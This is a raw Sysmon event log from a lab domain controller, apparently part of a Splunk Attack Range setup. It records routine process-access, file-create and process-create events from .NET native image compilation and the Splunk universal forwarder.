13:49:44.917{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.917{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F8-6005-4003-00000000A301}4656C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:44.792{59A5CD1D-91F6-6005-3E03-00000000A301}920C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\398-0\Microsoft.ActiveDirectory.Management.dll2021-01-18 13:49:44.792 10341000x80000000000000007554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.745{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:44.745{59A5CD1D-91F8-6005-3F03-00000000A301}3432C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.979{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.979{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4603-00000000A301}4604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.932{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.917{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.917{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4503-00000000A301}4692C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:45.901{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\d8-0\Microsoft.GroupPolicy.ServerAdminTools.GPOAdminGrid.dll2021-01-18 13:49:45.901 10341000x80000000000000007582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.807{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:45.807{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:45.807{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91F9-6005-4403-00000000A301}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
